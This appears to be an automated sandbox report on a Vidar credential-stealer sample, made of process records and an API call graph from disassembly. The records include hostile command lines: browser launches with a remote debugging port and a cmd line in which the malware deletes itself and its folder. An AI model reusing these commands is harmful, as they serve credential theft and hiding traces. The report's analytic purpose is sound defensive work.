                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                                          Start time:02:12:57
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:Miniature.com d
                                                                                                                                                                                                                                                                                          Imagebase:0xc10000
                                                                                                                                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                          Start time:02:12:57
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                          Start time:03:45:37
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                                                          Start time:03:45:38
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                                          Start time:03:45:51
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                                          Start time:03:45:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                                          Start time:03:45:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                                                          Start time:03:45:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                                                          Start time:03:45:56
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                                          Start time:03:45:56
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                                                          Start time:03:46:25
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit
                                                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                                                          Start time:03:46:25
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                                                          Start time:03:46:26
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                                                          Start time:03:46:52
                                                                                                                                                                                                                                                                                          Start date:19/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:17.5%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                            Signature Coverage:21%
                                                                                                                                                                                                                                                                                            Total number of Nodes:1482
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                                                                                                                                                                            execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 